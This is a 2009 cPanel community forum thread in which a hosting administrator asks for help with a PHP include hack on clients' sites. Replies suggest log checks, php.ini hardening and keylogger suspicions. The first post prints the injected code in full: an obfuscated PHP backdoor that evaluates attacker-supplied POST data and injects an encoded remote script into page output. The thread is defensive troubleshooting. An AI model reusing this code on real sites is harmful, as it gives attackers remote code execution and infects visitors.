The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

iframe/php exploit again

Discussion in 'General Discussion' started by gertiebeth, Mar 16, 2009.

  1. gertiebeth

    gertiebeth Well-Known Member

    Joined:
    Jun 4, 2003
    Messages:
    97
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Minnesota, USA
    cPanel Access Level:
    Root Administrator
    I currently run 22 linex servers using cPanel with heavy mod_security rules and a firewall. PHP has been hardened and many other security measures are in place. Right now I have 3 different people that I host who are suffering from php include hacks. It is only 3 people and their sites are hosted on several different servers. No one else is having a problem, which leads me to believe this is a problem with the user's PC. But for the life of me I cannot find out how to help them! I have tried Google, but I'm not quite search what to search for. Here is an example of the malicious code that is being inserting into their index.php, admin.php and other files:

    Code:
    <?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<10;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdwR3YlM0NwR3Zzczd4Y3JpcEd2cHQlMjBod3pzcmMzZ0QlM0QlMkZod3olMkY3OCUyRVo3WjExMFo3WiUyRTE3T281R0Q4JTJFMjRIYjlPbyUyRmpPb3F1ZXJHRDh5JTJFSGJqc0dEOCUzRVo3WiUzQzNnRCUyRnNjWjdack9vaWh3enB0JTNFJykucmVwbGFjZSgvSGJ8T298b0t8cEd2fEdEOHwzZ0R8czd4fFo3Wnxod3ovZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(".+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
    Does anyone recognize this? All I've been able to find is problems back in 2008 with IX webhosting, which I have no affiliation with. All of my servers are managed by me from SoftLayer.

    Any help?
     
  2. LiNUxG0d

    LiNUxG0d Well-Known Member

    Joined:
    Jun 25, 2003
    Messages:
    206
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Gatineau, Quebec, Canada
    Typical source injections...

    The common things you can look at, on the server side, are these:

    - Locate references to .txt in a users domlogs (in the URI portion of accesses), to see if they logged in using a PHP include... there shouldn't be any if you run mod_sec heavily, but there might... :P

    - Check the /var/log/messages to see if the hackers have privs by password that the user may not be aware of.

    - Do the same, but for /usr/local/cpanel/logs/access_log (grep the users' username and sift through the IPs for oddballs)

    Are you locking down php.ini at all? (disable_functions)

    If the user has a cPanel with reseller privs, then you may need to reset their WHM password, as it may be compromised.

    Realistically, if it's 3 or so sites, I would think a keylogger on their home PC. If it's 3 or so SERVERS with 100+ accounts or something to that effect, I would think it may be rooted, depending on what's installed on it and how old your kernel is.

    There are - really - many many many guesstimatable factors in your equation... if there are no logs to prove intrusion, then I would suspect that the issue is more serious than you may think.

    Never take it lightly. I'm sure you don't. :)
     
    #2 LiNUxG0d, Mar 16, 2009
    Last edited: Mar 16, 2009
  3. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    There are several threads that discussed the iframe injection problem. Check out these threads: http://forums.cpanel.net/showthread.php?t=62821
    http://forums.cpanel.net/showthread.php?t=78595
    http://forums.cpanel.net/showthread.php?t=78084
     
Loading...

Share This Page